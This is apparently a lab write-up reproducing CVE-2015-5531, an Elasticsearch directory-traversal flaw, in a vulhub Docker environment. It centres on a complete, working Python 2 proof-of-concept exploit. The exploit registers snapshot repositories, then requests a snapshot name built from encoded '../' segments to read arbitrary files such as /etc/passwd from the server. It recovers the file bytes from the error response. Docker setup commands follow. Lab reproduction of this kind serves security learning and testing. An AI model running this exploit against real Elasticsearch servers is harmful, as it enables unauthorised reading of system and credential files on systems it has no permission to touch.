Statement: Study hard and make progress every day.
Vulnerability description [Web Security | ElasticSearch directory traversal vulnerability (CVE-2015-5531)] In elasticsearch 1.5.1 and earlier the vulnerability can be triggered without any configuration. In later versions the configuration file elasticsearch.yml must contain path.repo; its value is a directory, which must be writable, and it effectively restricts the root location of snapshot (backup) repositories. If the value is not set, the repository feature is not enabled by default.
Affected versions: below 1.6.1
Reproduction: version v1.6.0 is used here.
Using vulhub:
cd /app/vulhub-master/elasticsearch/CVE-2015-5531
Start the environment with docker:
docker-compose up -d
Once the environment is up, visit http://your-ip:9200
http://192.168.239.129:9200
Go straight to the PoC, cve-2015-5331.py (a Python 2 script), with the following content (no modification needed):
#!/usr/bin/env python
# PoC for CVE-2015-5531 - Reported by Benjamin Smith
# Affects ElasticSearch 1.6.0 and prior
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
# Tested on default Linux (.deb) install || requires path.repo: to be set on config file
# Python 2 script: the print statements, "<>" and "except X, e" are Python 2 syntax.

import urllib, urllib2, json, sys, re

print "!dSR script for CVE-2015-5531\n"

if len(sys.argv) <> 3:
    print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
    sys.exit()

host = sys.argv[1]
fpath = urllib.quote(sys.argv[2], safe='')   # target file, fully URL-encoded ("/" -> %2F)
port = 9200
# Snapshot name made of URL-encoded "../" segments; ES appends it to the
# repository directory on disk without checking that it stays inside path.repo.
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
reponame = 'pwn'
baseurl = "http://%s:%s/_snapshot/" % (host, port)
xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)

def createSnapdirs():
    # Register two fs repositories: "pwn" at <path.repo>/dsr and "pwnie" at
    # <path.repo>/dsr/snapshot-ev1l, so that the "snapshot-ev1l" directory the
    # traversal starts from really exists and the "../" chain resolves.
    try:
        url = "%s/%s" % (baseurl, reponame)
        request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr"}}')
        request.get_method = lambda: 'POST'
        urllib2.urlopen(request)

        url = "%s/%sie" % (baseurl, reponame)
        request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
        request.get_method = lambda: 'POST'
        urllib2.urlopen(request)
    except urllib2.HTTPError, e:
        data = json.load(e)
        print "[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n"
        print str(data['error'])
        sys.exit()

def grabFile(xplurl):
    # ES fails to parse the target file as snapshot metadata and echoes its
    # bytes as decimal numbers inside the error message; the first two numbers
    # are the parser's offset and length, the rest are the file's bytes.
    try:
        urllib2.urlopen(xplurl)
    except urllib2.HTTPError, e:
        data = json.load(e)
        extrdata = re.findall(r'\d+', str(data['error']))
        decoder = bytearray()
        for i in extrdata[2:]:
            decoder.append(int(i))
        print decoder

def main():
    createSnapdirs()
    grabFile(xplurl)

if __name__ == "__main__":
    main()
Run the command (change the IP to your own):
python cve-2015-5331.py 192.168.239.129 /etc/passwd
Shut the environment down (do this after each use):
docker-compose down
Common docker-compose commands. Build/pull the images (after changing into a specific vulhub directory):
docker-compose build
docker-compose up -d
List containers (the first column is the container ID):
docker ps -a
Get a shell inside a given container (using the ID from the previous command):
docker exec -it ID /bin/bash
Shut the environment down (do this after each use):
docker-compose down